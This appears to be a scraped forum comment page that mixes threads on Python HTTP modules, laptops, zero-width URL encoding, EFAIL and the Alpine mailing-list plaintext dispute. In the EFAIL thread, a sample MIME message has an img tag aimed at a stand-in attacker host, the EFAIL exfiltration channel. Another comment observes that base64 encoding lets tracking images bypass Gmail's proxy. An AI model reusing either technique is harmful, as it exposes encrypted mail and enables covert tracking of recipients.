Well, there technically is http, with the http.client and http.server modules; it’s just so old that its abstractions are no longer abstract. It seems that nowadays Python’s standard library needs updated abstractions, but those wouldn’t see much use now, as there are 3rd-party libraries providing them (e.g. requests).
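For what it’s worth, the old modules are still perfectly usable for small things. A minimal sketch using only the standard-library http.server (the handler name, response body, and port choice here are arbitrary, not anything from a real project):

```python
# A handler that answers any GET with a fixed plain-text body.
# No third-party framework involved, just http.server.
from http.server import BaseHTTPRequestHandler, HTTPServer

class HelloHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        body = b"hello from the standard library\n"
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # silence per-request logging for the example

def make_server(port=0):
    # port=0 asks the OS for a free port; call .serve_forever() to run.
    return HTTPServer(("127.0.0.1", port), HelloHandler)
```

It works, but you can see the age of the abstraction: you are writing raw headers by hand, which is exactly the kind of thing requests-era libraries hide.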

                                                                                                                                                                      1. 2

                                                                                                                                                                        Is 0.14” difference in thinness worth access to the ports, user upgrade-ability, and the longevity of the keyboard?

                                                                                                                                                                        0.14” plus the obvious differences in construction quality? Yes. A hundred times yes.

                                                                                                                                                                        1. 7

At first look it might seem like cheap plastic. But looks are deceiving. IMO, most Thinkpads are second in toughness only to thoughbooks. The build quality is great. The plastic feels good, is resistant to scratches, and even if you manage to scratch it, the texture hides it. It has a metal frame under the plastic, which makes it very hard to break. Meanwhile, Apple sandwiches everything between two sheets of machined aluminum, which, while better than plastic, isn’t that strong.

                                                                                                                                                                          1. 3

                                                                                                                                                                            I know you meant to type toughbooks, however I would really like to see a thoughtbook.

                                                                                                                                                                          2. 7

                                                                                                                                                                            Are you actually implying that Thinkpads are poorly built? Thinkpads are the laptops you’ll find in Fallout-style post-apocalyptic shelters. I’ve been using Thinkpads for 12 years now… Most of them are indestructible by usual hardware standards :-)

                                                                                                                                                                            1. -1

                                                                                                                                                                              Are you actually implying that Thinkpads are poorly built?

                                                                                                                                                                              Yes, compared to Apple laptops, Thinkpads are poorly built.

                                                                                                                                                                              1. 5

                                                                                                                                                                                It’s clear from the language used by others here that Thinkpads are romanticised. I mean, I like them too, but it’s going to be hard for any of us to evaluate them honestly when much of the sentiment in this thread is borne out of “screw Apple!”. I agree that MacBook build quality is second to none (besides the flawed butterfly switches).

                                                                                                                                                                            2. 6

                                                                                                                                                                              I thought this too until I held my t480s in my hands. It’s solid as a rock: no flex or give in the body at all. Everyone who has held it remarks that it feels solid. Time will tell on longevity but I’m pretty optimistic.

                                                                                                                                                                            1. 2

Wouldn’t this quickly stop working because of URL length limits in browsers? There is only one character, so for each new URL you just append one more character.

Edit: I looked at the source code; it actually uses 2 different characters, so the encoding is much more effective and will handle around 2^2000 URLs, which is probably more than the underlying storage could hold (the amount of storage needed is far beyond comprehension). I think it could even be done without a storage layer by encoding the URL itself with zero-width characters. That could reliably store URLs up to 250 characters long, and maybe longer, depending on the browser.
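The storage-free variant is easy to sketch. This is a hypothetical illustration of the idea, not the site’s actual code: two zero-width code points (U+200B zero-width space and U+200C zero-width non-joiner, chosen arbitrarily here) stand in for the 0 and 1 bits of the URL’s UTF-8 bytes.

```python
# Encode a URL's bytes as an invisible bit string, one zero-width
# character per bit, then decode it back.
ZERO, ONE = "\u200b", "\u200c"  # zero-width space / non-joiner

def encode(url: str) -> str:
    bits = "".join(f"{byte:08b}" for byte in url.encode("utf-8"))
    return "".join(ONE if b == "1" else ZERO for b in bits)

def decode(blob: str) -> str:
    bits = "".join("1" if ch == ONE else "0" for ch in blob)
    data = bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))
    return data.decode("utf-8")
```

Note the 8× blow-up: each byte of the original URL becomes eight invisible characters, which is exactly why the browser URL length limits mentioned above become the binding constraint.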

                                                                                                                                                                              1. 3

I thought I would see EFAIL somewhere in there.

                                                                                                                                                                                1. 1

                                                                                                                                                                                  Yes! That is not a PGP issue, that is a mail client issue.

                                                                                                                                                                                  1. 2

Concretely, it’s an HTML mail issue.

                                                                                                                                                                                    1. 2

It is not. It is an issue with email clients that can’t correctly parse multipart/mixed content and don’t separate text/html parts from application/pkcs7-mime parts. HTML only provided the channel for sending those contents out to the attacker. Without the botched parsing there wouldn’t have been any problem. But still, it is true that HTML allowed the data to be exfiltrated.
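The parsing point can be made concrete with Python’s standard email library. This is a simplified illustration, not any real client’s code, and the attacker hostname is made up: the safe behaviour is to keep each leaf part separate rather than stitching the HTML and the encrypted part into one document, which is the mistake EFAIL-style exfiltration relied on.

```python
# Walk a multipart/mixed message and keep the parts separate instead
# of concatenating them into one HTML document.
from email import message_from_string

RAW = """\
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b"

--b
Content-Type: text/html

<img src="http://attacker.example/
--b
Content-Type: application/pkcs7-mime

(encrypted blob)
--b--
"""

def split_parts(raw: str):
    msg = message_from_string(raw)
    # Each leaf stays its own (content_type, payload) pair; the
    # encrypted part is never merged into the unterminated <img> tag.
    return [(p.get_content_type(), p.get_payload())
            for p in msg.walk() if not p.is_multipart()]
```

A client that renders the parts from this list independently gives the unterminated `<img src="` nothing to swallow; a client that glues the payloads together hands the ciphertext to the attacker’s server as part of the image URL.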

                                                                                                                                                                                1. 14

                                                                                                                                                                                  i’m not sure if this should be recognized by commenting here, as it feels outright like a troll attempt.

assuming this is a reaction to https://lobste.rs/s/ktvzwl/use_plaintext_email : asking users and giving directions to use plaintext isn’t “gatekeeping”. by using this word you put a negative spin on the plaintext email site, maybe even on the author. i don’t want to see this kind of conversation here.

                                                                                                                                                                                  edit (after the archived version was linked here):

                                                                                                                                                                                  Request for Guillotine: 1

                                                                                                                                                                                  really? that low?

                                                                                                                                                                                  Upon the dismantling of the original mailing lists due to the power vacuum caused by several high-profile Alpine Linux core contributors leaving the project due to burnout or personal reasons, the individual behind SourceHut, aka sr.ht, stepped up to provide new mailing list software in order to make themselves an instrumental part of the Alpine Linux ecosystem and deeply embedded in the core development team. This is commonly described as a “position of power”.

                                                                                                                                                                                  Scientists have not yet discovered whether this “position of power” in the Alpine Linux community has yielded any benefits that are typically borne of “positions of power” in enterprises that matter, such as fame, wealth, or high-altitude sexual escapades. While it is too early to make a total judgement call, there is no indication that any of these facets of being in a “position of power” are to become true.

                                                                                                                                                                                  yes, that low. throw more dirt.

                                                                                                                                                                                  1. 9

                                                                                                                                                                                    As far as I’m aware, according to the Fediverse feed of the author of “useplaintext.email”[1], the site sprang up as a response to people asking why - all of a sudden - they couldn’t contribute to the mailing list[2] in the IRC channel. This happened without any warning to any user or developer, and was solely at the whims of the individual who was now in charge of the mailing list software (and made the useplaintext.email website).

The individual who wrote that site, however, by locking people out of contributing to a Linux distribution because they came into control of the mailing lists, probably does qualify.

The submitter of this link actually orphaned all of their packages, because going through the hassle of using a different email client just to contact the mailing list was not worth it for what is ultimately a volunteer effort.

                                                                                                                                                                                    1. https://cmpwn.com/@sir/102492883435461992
                                                                                                                                                                                    2. https://lists.alpinelinux.org/~alpine/devel/%3CBVGP7GB8D8FN.2Z691JGTQHQ7L%40homura%3E
                                                                                                                                                                                    1. 3

that’s all well, but it doesn’t warrant a “Request for Guillotine” and smear campaigns. dropping the packages is unfortunate, but if it feels like the right thing to do, it’s a personal decision.

                                                                                                                                                                                      good alternatives are:

• try to discuss it reasonably, preferably not via a microblogging service, which is a shitty medium for that.
                                                                                                                                                                                      • write a patch for the mailing list software so that only the html part is dropped, and ask for inclusion of this patch.
                                                                                                                                                                                      • ask if you can host the mailinglist instead, with the settings you want. this bears the risk that other people are fine with blocking html mails and your offer is politely declined.
                                                                                                                                                                                      • fork the distribution.
                                                                                                                                                                                      1. 8

                                                                                                                                                                                        write a patch for the mailing list software so that only the html part is dropped, and ask for inclusion of this patch.

                                                                                                                                                                                        I personally did just that, and it was rejected. I also tried to offer a self-reply patch, and that was also denied:

                                                                                                                                                                                        21:47:53 <awilfox> I didn't see any question about this on the discuss archives: is there a way to have self-replies copied to your email?  on virtually all mailing lists I'm subscribed to, when I email the list I receive a copy back (which is reassuring that the ML software did not eat it and there were no MX issues).  I'm not getting self replies on sr.ht MLs.
                                                                                                                                                                                        21:48:18 <ddevault> no, this is not possible
                                                                                                                                                                                        21:48:39 <awilfox> would a patch adding this option be considered?
                                                                                                                                                                                        21:48:47 <ddevault> probably not
                                                                                                                                                                                        
                                                                                                                                                                                        1. 3

try to discuss it reasonably, preferably not via a microblogging service, which is a shitty medium for that.

Yeah, microblogging services are certainly not ideal. It’s been discussed at length in the IRC channels (which are the official communication medium for the project). I’ve also seen discussions elsewhere about the lack of action after those discussions: namely, the person in control doubling down on leaving it disabled.

                                                                                                                                                                                          write a patch for the mailing list software so that only the html part is dropped, and ask for inclusion of this patch.

                                                                                                                                                                                          The mailing list software is developed by the same person who runs it. I believe this was raised and was responded to with a firm “no”.

                                                                                                                                                                                          ask if you can host the mailinglist instead, with the settings you want. this bears the risk that other people are fine with blocking html mails and your offer is politely declined.

                                                                                                                                                                                          No idea where anyone is at with that. I will point out this part from the site:

                                                                                                                                                                                          This was described by the Alpine Linux project lead as:

                                                                                                                                                                                          a surprise and unintentional (except from a single person)
                                                                                                                                                                                          super annoying to get locked out of participation like this
                                                                                                                                                                                          imho, unacceptable

                                                                                                                                                                                          So I’m not sure there’s a consensus even there.

                                                                                                                                                                                          fork the distribution.

                                                                                                                                                                                          I don’t know if you can get more fringe than a fork of something like Alpine Linux. Perhaps forking Void Linux? Forking over issues that are surmountable with encouragement and a correct understanding (e.g., it’s inconvenient for developers who use mobile devices, it breaks screen readers (and consequently affects those with low or no vision), and provides no feedback to users if their emails are dropped) is, in my view, pointless. I personally feel forking a project is kind of a “last resort” sort of thing.

                                                                                                                                                                                          That said, I haven’t ever forked a project, so perhaps it isn’t. I’d appreciate your own view on that if you disagree.

                                                                                                                                                                                          1. 5

                                                                                                                                                                                            Note: I haven’t been able to find the source for the Alpine Linux project lead quote, so it might as well be fake

                                                                                                                                                                                            1. 2

                                                                                                                                                                                              Yeah, microblogging services are certainly not ideal. It’s been discussed at length in the IRC channels (which are the official communication medium for the project). I’ve seen discussions about lack of action after said discussions in places elsewhere. Namely, the person in control doubling down on leaving it disabled.

                                                                                                                                                                                              i’m not involved in alpine linux, so i didn’t know about these discussions.

                                                                                                                                                                                              The mailing list software is developed by the same person who runs it.

                                                                                                                                                                                              i see it this way: the developer has the spare resources to host the list, providing it for free to the alpine linux community. i don’t think that the community is forced by anyone to use it. if the majority decides the list software is fine, then that’s the consensus. if the project lead thinks it’s unacceptable, it is maybe time to look for another place to host the list. blaming someone giving out free things is just plain wrong.

                                                                                                                                                                                              I don’t know if you can get more fringe than a fork of something like Alpine Linux. Perhaps forking Void Linux? Forking over issues that are surmountable with encouragement and a correct understanding (e.g., it’s inconvenient for developers who use mobile devices, it breaks screen readers (and consequently affects those with low or no vision), and provides no feedback to users if their emails are dropped) is, in my view, pointless. I personally feel forking a project is kind of a “last resort” sort of thing.

                                                                                                                                                                                              my list was in increasing “drama-steps”, yes. forking almost always isn’t the right solution.

                                                                                                                                                                                              my point is that the reaction here (calling for beheading) isn’t a way to fix issues, it’s just flaming because something isn’t the way one wants it to be. i know that it is hard today for many people if their points of view aren’t accepted as the only right ones, but then it may be time for a fork instead of destructive behavior.

                                                                                                                                                                                              That said, I haven’t ever forked a project, so perhaps it isn’t. I’d appreciate your own view on that if you disagree.

                                                                                                                                                                                              me neither, but there are “forks” of slackware for example, which mostly are additional package sets and tools though. forking doesn’t have to mean that you go completely different paths.

                                                                                                                                                                                              1. 5

                                                                                                                                                                                                I’m only going to quote short parts, not to take them out of context but simply to make this thread easier to read as it gets further indented left.

                                                                                                                                                                                                i’m not involved in alpine linux, so i didn’t know about these discussions.

                                                                                                                                                                                                Fair. Me neither, other than being in the IRC channels. I already have a bouncer on Freenode so I just idle in there. I use Alpine quite a bit for Docker so it’s nice to see what’s going on in there sometimes.

                                                                                                                                                                                                i see it this way …

                                                                                                                                                                                                You raise a good point, however I take one small issue with this: This particular “feature” was never raised by the person who offered the hosting until after the transition had taken place. I can’t immediately think of a real-world analogy, but I imagine you don’t need one.

                                                                                                                                                                                                To offer to host the mailing list then lock out a portion of the user base until they fit your world view is, in my (in the big picture, unqualified and irrelevant) opinion, in pretty bad taste. This should have been raised as a condition prior to the implementation.

                                                                                                                                                                                                As to who is at fault for this, I wouldn’t be able to say. I don’t know if it’s unreasonable to assume that a mailing list software would not drop emails given undisclosed criteria.

                                                                                                                                                                                                my point is that the reaction here …

                                                                                                                                                                                                Agreed, although based on context of the document one could infer that it was aimed at the practice of locking users out itself, given the first line being “Elitism-Free Working Group”. Thinking otherwise is uncomfortable in my opinion.

                                                                                                                                                                                                there are “forks” of slackware for example …

                                                                                                                                                                                                Very good point. Thank you.

                                                                                                                                                                                                1. 1

                                                                                                                                                                                                  You raise a good point […]

                                                                                                                                                                                                  i think that it just hasn’t occurred to them that this would be a problem. i’d always assume plaintext on mailinglists, especially on lists of distributions etc. the lock-out was an unfortunate side effect of this. that the list shouldn’t just drop the mails but should bounce them is a valid point though. “things just went wrong”, probably because of bad communication, not bad intent.

                                                                                                                                                                                                  Agreed, although based on context […]

                                                                                                                                                                                                  i didn’t like this document because of linguistic tactics, it’s more-or-less authored anonymously, and full of ad hominem arguments. it’s bad taste and counterproductive.

                                                                                                                                                                                                2. 1

                                                                                                                                                                                                  my point is that the reaction here (calling for beheading) isn’t a way to fix issues, it’s just flaming because something isn’t the way one wants it to.

                                                                                                                                                                                                  Well beheadings rarely fix anything, but we can’t be sure until we try. What if the head grows back? I thought that website to be pretty funny anyway, but I guess YMMV. Maybe a satire tag would’ve helped. :)

                                                                                                                                                                                                  i know that it is hard today for many people if their points of view aren’t accepted as the only right one, but then it may be time for a fork instead of destructive behavior.

                                                                                                                                                                                                  If someone makes a website about how colonialism is cool, is it destructive to make the opposite website, or just discussion?

                                                                                                                                                                                            2. 2

                                                                                                                                                                                              I wasn’t aware of that (I also wouldn’t be affected by it, being a TUI email user). That does seem like a harsh sudden requirement for continued participation/contribution in the project.

                                                                                                                                                                                          1. 4

                                                                                                                                                                                            I read the archived version, and it is so hilariously wrong. Quotes pulled out of nowhere, quoting yourself without any source and putting it like it’s not you saying it, and lines like this: “This phenomenon has been named “not being a contrarian” by the scientific community.”

                                                                                                                                                                                            1. 2

                                                                                                                                                                                              I’d mitigate this by considering it a gut reaction. That provokes a gut-gut-reaction in return from everyone.

                                                                                                                                                                                            1. 6

                                                                                                                                                                                              I presume this is partly triggered in reply to all the noise about the SuperHuman client….

                                                                                                                                                                                              Interesting point here…

                                                                                                                                                                                              1. Privacy invasion and tracking

                                                                                                                                                                                              The accusation levelled against HTML emails is that marketers use them to embed things like a tracking pixel or other minutiae in order to discern whether or not you have opened and read the e-mail. E-mail providers such as Google will automatically cache all remote content and serve it from their own servers to prevent your IP address from being leaked to the owner of the server to which the tracking pixel points. This also masks the time at which you open the email. Additionally, bad actors are also known to use knives. An adequate justification for using scissors or an egg-wash brush to cut bread has yet to be seen.
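As a rough sketch of the mechanism (the tracker.example.com URL and recipient id below are invented for illustration): a tracking pixel is just a tiny remote image whose URL identifies the recipient, and a caching proxy like Google’s has to find exactly these remote image URLs before rewriting them to point at its own servers.

```python
from html.parser import HTMLParser

# Hypothetical HTML email body: the 1x1 "tracking pixel" is just a
# remote image whose URL encodes a per-recipient identifier.
EMAIL_HTML = """
<p>Hello!</p>
<img src="https://tracker.example.com/open?id=recipient-1234"
     width="1" height="1" alt="">
"""

class ImgSrcCollector(HTMLParser):
    """Collects the src of every <img> tag -- roughly the first step a
    provider performs before rewriting remote images to its proxy."""
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.srcs.extend(v for k, v in attrs if k == "src")

parser = ImgSrcCollector()
parser.feed(EMAIL_HTML)
print(parser.srcs)  # -> ['https://tracker.example.com/open?id=recipient-1234']
```

Fetching that URL through a proxy, from the proxy’s IP, is what hides the reader’s address (and, if cached, the open time) from whoever runs the tracker.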

                                                                                                                                                                                              Apparently Superhuman is an invitation-only Gmail front-end so something doesn’t match up….

                                                                                                                                                                                              I took a poke at some image rich email in my mail box…. and yes indeed, the images come from https://ci3.googleusercontent.com/proxy/

                                                                                                                                                                                              Very interestingly, I can wget the images successfully, i.e. WITHOUT my Gmail credentials.

                                                                                                                                                                                              Have they encoded my credentials in the URL?

                                                                                                                                                                                              The cache control header is Cache-Control: max-age=300, which is pretty short.
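For what it’s worth, the freshness lifetime can be pulled out of such a header mechanically; a minimal sketch, handling only the simple comma-separated directive form:

```python
# Minimal sketch: extract max-age (in seconds) from a Cache-Control
# header value such as the "max-age=300" observed above.
def max_age(cache_control):
    for directive in cache_control.split(","):
        directive = directive.strip()
        if directive.startswith("max-age="):
            return int(directive.split("=", 1)[1])
    return None  # no max-age directive present

print(max_age("max-age=300"))          # -> 300
print(max_age("public, max-age=300"))  # -> 300
```

300 seconds means the proxy is willing to re-fetch the image every five minutes, so repeated opens spread over time can still trigger fresh fetches.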

                                                                                                                                                                                              So does Superhuman have some deal with Gmail? Or is it using a public API on Gmail?

                                                                                                                                                                                              A bit more experimentation reveals that if you insert a picture from a web address, it assumes the pic is public anyway and doesn’t require credentials.

                                                                                                                                                                                              If you upload a pic, the URL is so long that wget barfs (but curl seems to work), and the server replies “403 Forbidden”.

                                                                                                                                                                                              1. 6

                                                                                                                                                                                                u wot m8

                                                                                                                                                                                                This seems to be a response to use plaintext email

                                                                                                                                                                                                1. 4

                                                                                                                                                                                                  Ok. Didn’t see that thread go by…. and if you wade all the way down to the references, it references that, so you’re right.

                                                                                                                                                                                                  Still, SuperHuman seems to have defeated the proxying somehow (unless it doesn’t work its magic on Gmail).

                                                                                                                                                                                                  1. 3

                                                                                                                                                                                                    Gmail proxies the requests only when asked, so Superhuman still knows when the email was opened, but not the IP address of the person who opened it.

                                                                                                                                                                                                    1. 2

                                                                                                                                                                                                      Aha! I think I have spotted a difference….

                                                                                                                                                                                                      If the sender base64 encodes the email, gmail doesn’t proxy image urls!

                                                                                                                                                                                                      (I noted this analysing an excellent phishing mail)
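That observation is easy to reproduce with Python’s standard email library; a sketch (the tracker URL is made up), showing why a base64 Content-Transfer-Encoding hides image URLs from anything that only scans the raw message text:

```python
from email.message import EmailMessage

# Build an HTML mail whose body is base64-encoded on the wire.
msg = EmailMessage()
msg["Subject"] = "demo"
msg.set_content(
    '<img src="https://tracker.example.com/px.gif">',
    subtype="html",
    cte="base64",  # force Content-Transfer-Encoding: base64
)

raw = msg.as_string()
# The URL does not appear anywhere in the raw (encoded) message...
print("tracker.example.com" in raw)       # -> False
# ...but decoding the payload recovers it.
decoded = msg.get_payload(decode=True).decode()
print("tracker.example.com" in decoded)   # -> True
```

A rewriter that only pattern-matches URLs in the raw body would miss this one, which would be consistent with the proxying behaviour (or lack of it) observed above.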

                                                                                                                                                                                                      1. 1

                                                                                                                                                                                                        https://mikeindustries.com/blog/archive/2019/06/superhuman-is-spying-on-you

                                                                                                                                                                                                        If I send you an email using Superhuman (no matter what email client you use), and you open it 9 times, this is what I see:

                                                                                                                                                                                                          Ok, I think the original blogger overstated the capabilities wrt Gmail and retracted that in a later post. With Gmail it can see when an email was opened, not the location.

                                                                                                                                                                                                        However it seems clear that for a number of other email clients out there you can see both, and even when you revisit.